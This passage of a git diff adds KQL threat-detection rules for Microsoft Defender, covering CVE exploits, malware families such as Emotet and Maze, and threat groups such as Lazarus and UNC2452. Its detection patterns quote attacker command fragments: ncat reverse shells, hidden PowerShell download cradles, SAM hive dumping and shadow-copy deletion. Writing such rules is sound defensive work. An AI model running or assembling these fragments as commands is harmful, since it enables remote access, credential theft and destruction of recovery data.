+// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats
+// False Positives:
+//   - New printer port install on host
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ".bat" or RegistryValueData contains ".com" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".ps1" or RegistryValueData contains ".vbe" or RegistryValueData contains ".vbs" or RegistryValueData contains "C:") and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Ports"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql
new file mode 100644
index 00000000..d6ec9f06
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PrinterPorts Creation (CVE-2020-1048)
+// Author: EagleEye Team, Florian Roth
+// Date: 2020-05-13
+// Level: high
+// Description: Detects new commands that add new printer port which point to suspicious file
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.t1059.001, cve.2020-1048, detection.emerging-threats
+// False Positives:
+//   - New printer port install on host
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-PrinterPort -Name" and (ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bat")) or ProcessCommandLine contains "Generic / Text Only"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql
new file mode 100644
index 00000000..daaeb3ac
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql
@@ -0,0 +1,12 @@
+// Title: DNS RCE CVE-2020-1350
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-15
+// Level: critical
+// Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2020-1350, detection.emerging-threats
+// False Positives:
+//   - Unknown but benign sub processes of the Windows DNS service dns.exe
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\System32\\dns.exe" and (not((FolderPath endswith "\\System32\\werfault.exe" or FolderPath endswith "\\System32\\conhost.exe" or FolderPath endswith "\\System32\\dnscmd.exe" or FolderPath endswith "\\System32\\dns.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql
new file mode 100644
index 00000000..2db1b864
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql
@@ -0,0 +1,10 @@
+// Title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the execution of the commonly used ZeroLogon PoC executable.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1210, cve.2020-1472, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Administrator" and ProcessCommandLine contains "-c") and (FolderPath endswith "\\cool.exe" or FolderPath endswith "\\zero.exe") and InitiatingProcessFolderPath endswith "\\cmd.exe") and ((ProcessCommandLine contains "taskkill" and ProcessCommandLine contains "/f" and ProcessCommandLine contains "/im") or ProcessCommandLine contains "powershell")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql
new file mode 100644
index 00000000..b8923aab
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql
@@ -0,0 +1,10 @@
+// Title: Blue Mockingbird
+// Author: Trent Liffick (@tliffick)
+// Date: 2020-05-14
+// Level: high
+// Description: Attempts to detect system changes made by Blue Mockingbird
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, attack.t1047, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "sc config" and ProcessCommandLine contains "wercplsupporte.dll") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine endswith "COR_PROFILER" and FolderPath endswith "\\wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql
new file mode 100644
index 00000000..44aba9ba
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql
@@ -0,0 +1,10 @@
+// Title: Blue Mockingbird - Registry
+// Author: Trent Liffick (@tliffick)
+// Date: 2020-05-14
+// Level: high
+// Description: Attempts to detect system changes made by Blue Mockingbird
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.t1112, attack.t1047, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql b/KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql
new file mode 100644
index 00000000..29d8263c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential Emotet Rundll32 Execution
+// Author: FPT.EagleEye
+// Date: 2020-12-25
+// Level: critical
+// Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ",RunDLL" or ProcessCommandLine endswith ",Control_RunDLL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((InitiatingProcessFolderPath endswith "\\tracker.exe" or (ProcessCommandLine endswith ".dll,Control_RunDLL" or ProcessCommandLine endswith ".dll\",Control_RunDLL" or ProcessCommandLine endswith ".dll',Control_RunDLL"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql
new file mode 100644
index 00000000..27c971e5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql
@@ -0,0 +1,13 @@
+// Title: FlowCloud Registry Markers
+// Author: NVISO
+// Date: 2020-06-09
+// Level: critical
+// Description: Detects FlowCloud malware registry markers from threat group TA410.
+// The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}" or RegistryKey contains "\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" or RegistryKey contains "\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" or RegistryKey endswith "\\SYSTEM\\Setup\\PrintResponsor*"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql
new file mode 100644
index 00000000..9b82de63
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Ke3chang/TidePool Malware Activity
+// Author: Markus Neis, Swisscom
+// Date: 2020-06-18
+// Level: high
+// Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
+// MITRE Tactic: Defense Evasion
+// Tags: attack.g0004, attack.defense-evasion, attack.t1562.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-Property DWORD -name DisableFirstRunCustomize -value 2 -Force" or ProcessCommandLine contains "-Property String -name Check_Associations -value" or ProcessCommandLine contains "-Property DWORD -name IEHarden -value 0 -Force"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql
new file mode 100644
index 00000000..a8e307ec
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Maze Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-08
+// Level: critical
+// Description: Detects specific process characteristics of Maze ransomware word document droppers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.t1047, attack.impact, attack.t1490, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith ".tmp" and InitiatingProcessFolderPath endswith "\\WINWORD.exe") or (ProcessCommandLine endswith "shadowcopy delete" and FolderPath endswith "\\wmic.exe" and InitiatingProcessFolderPath contains "\\Temp\\") or (ProcessCommandLine contains "\\..\\..\\system32" and ProcessCommandLine endswith "shadowcopy delete")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql
new file mode 100644
index 00000000..d72fcae8
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql
@@ -0,0 +1,10 @@
+// Title: Trickbot Malware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-11-26
+// Level: high
+// Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1559, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wermgr.exe" and InitiatingProcessCommandLine contains "DllRegisterServer" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql b/KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql
new file mode 100644
index 00000000..6799014d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql
@@ -0,0 +1,10 @@
+// Title: EvilNum APT Golden Chickens Deployment Via OCX Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-10
+// Level: critical
+// Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "/s" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "\\AppData\\Roaming\\" and ProcessCommandLine contains ".ocx"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql b/KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql
new file mode 100644
index 00000000..2016ec13
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql
@@ -0,0 +1,10 @@
+// Title: GALLIUM IOCs
+// Author: Tim Burrell
+// Date: 2020-02-07
+// Level: high
+// Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.command-and-control, attack.t1212, attack.t1071, attack.g0093, detection.emerging-threats
+
+DeviceProcessEvents
+| where (SHA256 startswith "9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd" or SHA256 startswith "7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b" or SHA256 startswith "657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5" or SHA256 startswith "2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29" or SHA256 startswith "52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77" or SHA256 startswith "a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3" or SHA256 startswith "5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022" or SHA256 startswith "6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883" or SHA256 startswith "3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e" or SHA256 startswith "1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7" or SHA256 startswith "fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1" or SHA256 startswith "7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c" or SHA256 startswith "178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945" or SHA256 startswith "51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9" or SHA256 startswith "889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79" or SHA256 startswith "332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf" or SHA256 startswith "44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08" or SHA256 startswith "63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef" or SHA256 startswith "056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070") or (SHA1 startswith "53a44c2396d15c3a03723fa5e5db54cafd527635" or SHA1 startswith "9c5e496921e3bc882dc40694f1dcc3746a75db19" or SHA1 startswith "aeb573accfd95758550cf30bf04f389a92922844" or SHA1 startswith "79ef78a797403a4ed1a616c68e07fff868a8650a" or SHA1 startswith "4f6f38b4cec35e895d91c052b1f5a83d665c2196" or SHA1 startswith "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" or SHA1 startswith "e841a63e47361a572db9a7334af459ddca11347a" or SHA1 startswith "c28f606df28a9bc8df75a4d5e5837fc5522dd34d" or SHA1 startswith "2e94b305d6812a9f96e6781c888e48c7fb157b6b" or SHA1 startswith "dd44133716b8a241957b912fa6a02efde3ce3025" or SHA1 startswith "8793bf166cb89eb55f0593404e4e933ab605e803" or SHA1 startswith "a39b57032dbb2335499a51e13470a7cd5d86b138" or SHA1 startswith "41cc2b15c662bc001c0eb92f6cc222934f0beeea" or SHA1 startswith "d209430d6af54792371174e70e27dd11d3def7a7" or SHA1 startswith "1c6452026c56efd2c94cea7e0f671eb55515edb0" or SHA1 startswith "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" or SHA1 startswith "4923d460e22fbbf165bbbaba168e5a46b8157d9f" or SHA1 startswith "f201504bd96e81d0d350c3a8332593ee1c9e09de" or SHA1 startswith "ddd2db1127632a2a52943a2fe516a2e7d05d70d2")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql b/KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql
new file mode 100644
index 00000000..3dc358a5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Greenbug Espionage Group Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-20
+// Level: critical
+// Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
+// MITRE Tactic: Execution
+// Tags: attack.g0049, attack.execution, attack.t1059.001, attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith ":\\ProgramData\\adobe\\Adobe.exe" or FolderPath endswith ":\\ProgramData\\oracle\\local.exe" or FolderPath endswith "\\revshell.exe" or FolderPath endswith "\\infopagesbackup\\ncat.exe" or FolderPath endswith ":\\ProgramData\\comms\\comms.exe") or (ProcessCommandLine contains "-ExecutionPolicy Bypass -File" and ProcessCommandLine contains "\\msf.ps1") or (ProcessCommandLine contains "infopagesbackup" and ProcessCommandLine contains "\\ncat" and ProcessCommandLine contains "-e cmd.exe") or ProcessCommandLine contains "L3NlcnZlcj1" or (ProcessCommandLine contains "system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill" or ProcessCommandLine contains "-nop -w hidden -c $k=new-object" or ProcessCommandLine contains "[Net.CredentialCache]::DefaultCredentials;IEX " or ProcessCommandLine contains " -nop -w hidden -c $m=new-object net.webclient;$m" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass whoami" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass netstat -a")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql b/KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql
new file mode 100644
index 00000000..22ef6268
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql
@@ -0,0 +1,12 @@
+// Title: Lazarus Group Activity
+// Author: Florian Roth (Nextron Systems), wagga
+// Date: 2020-12-23
+// Level: critical
+// Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
+// MITRE Tactic: Execution
+// Tags: attack.g0032, attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "reg.exe save hklm\\sam %temp%\\~reg_sam.save" or ProcessCommandLine contains "1q2w3e4r@#$@#$@#$" or ProcessCommandLine contains " -hp1q2w3e4 " or ProcessCommandLine contains ".dat data03 10000 -p ") or (ProcessCommandLine contains "netstat -aon | find " and ProcessCommandLine contains "ESTA" and ProcessCommandLine contains " > %temp%\\~") or (ProcessCommandLine contains ".255 10 C:\\ProgramData\\IBM\\" and ProcessCommandLine contains ".DAT") or ((ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\RECYCLER\\") and (ProcessCommandLine contains " /c " and ProcessCommandLine contains " -p 0x")) or ((ProcessCommandLine contains ".bin," or ProcessCommandLine contains ".tmp," or ProcessCommandLine contains ".dat," or ProcessCommandLine contains ".io," or ProcessCommandLine contains ".ini," or ProcessCommandLine contains ".db,") and (ProcessCommandLine contains "rundll32 " and ProcessCommandLine contains "C:\\ProgramData\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql b/KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql
new file mode 100644
index 00000000..8766ef2a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql
@@ -0,0 +1,10 @@
+// Title: Leviathan Registry Key Activity
+// Author: Aidan Bracher
+// Date: 2020-07-07
+// Level: critical
+// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql
new file mode 100644
index 00000000..b0d8a9b3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious VBScript UN2452 Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious inline VBScript keywords as used by UNC2452
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Execute" and ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" and ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion") and (not(ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql
new file mode 100644
index 00000000..d5447f08
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql
@@ -0,0 +1,12 @@
+// Title: UNC2452 PowerShell Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-20
+// Level: critical
+// Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1047, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-WMIMethod win32_process -name create -argumentlist" and ProcessCommandLine contains "rundll32 c:\\windows") or (ProcessCommandLine contains "wmic /node:" and ProcessCommandLine contains "process call create \"rundll32 c:\\windows")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql
new file mode 100644
index 00000000..64384954
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql
@@ -0,0 +1,10 @@
+// Title: UNC2452 Process Creation Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-22
+// Level: high
+// Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".txt")) or ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".log")) or ((ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "C:\\Windows" and ProcessCommandLine contains ".dll,Tk_") and (InitiatingProcessCommandLine contains "wscript.exe" and InitiatingProcessCommandLine contains ".vbs")) or (ProcessCommandLine contains "cmd.exe /C " and (InitiatingProcessCommandLine contains "C:\\Windows" and InitiatingProcessCommandLine contains ".dll") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessCommandLine =~ "" and FolderPath endswith "\\dllhost.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql b/KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql
new file mode 100644
index 00000000..161f5906
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql
@@ -0,0 +1,10 @@
+// Title: TAIDOOR RAT DLL Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-30
+// Level: high
+// Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1055.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "dll,MyStart" or ProcessCommandLine contains "dll MyStart") or (ProcessCommandLine endswith " MyStart" and ProcessCommandLine contains "rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql
new file mode 100644
index 00000000..118003cd
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql
@@ -0,0 +1,12 @@
+// Title: Winnti Malware HK University Campaign
+// Author: Florian Roth (Nextron Systems), Markus Neis
+// Date: 2020-02-01
+// Level: critical
+// Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath startswith "C:\\ProgramData\\DRM" and (InitiatingProcessFolderPath contains "C:\\Windows\\Temp" or InitiatingProcessFolderPath contains "\\hpqhvind.exe")) or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM") or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath endswith "\\Test.exe") or FolderPath =~ "C:\\ProgramData\\DRM\\CLR\\CLR.exe" or (FolderPath endswith "\\SearchFilterHost.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM\\Windows")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql
new file mode 100644
index 00000000..51e20957
--- /dev/null
+++ b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql
@@ -0,0 +1,12 @@
+// Title: Winnti Pipemon Characteristics
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2020-07-30
+// Level: critical
+// Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats
+// False Positives:
+//   - Legitimate setups that use similar flags
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "setup0.exe -p" or (ProcessCommandLine contains "setup.exe" and (ProcessCommandLine endswith "-x:0" or ProcessCommandLine endswith "-x:1" or ProcessCommandLine endswith "-x:2"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql
new file mode 100644
index 00000000..5a41e6a4
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql
@@ -0,0 +1,10 @@
+// Title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-06-29
+// Level: critical
+// Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.resource-development, attack.t1587, cve.2021-1675, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\123"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql
new file mode 100644
index 00000000..9a97d582
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential PrintNightmare Exploitation Attempt
+// Author: Bhabesh Raj
+// Date: 2021-07-01
+// Level: high
+// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, detection.emerging-threats
+
+DeviceFileEvents
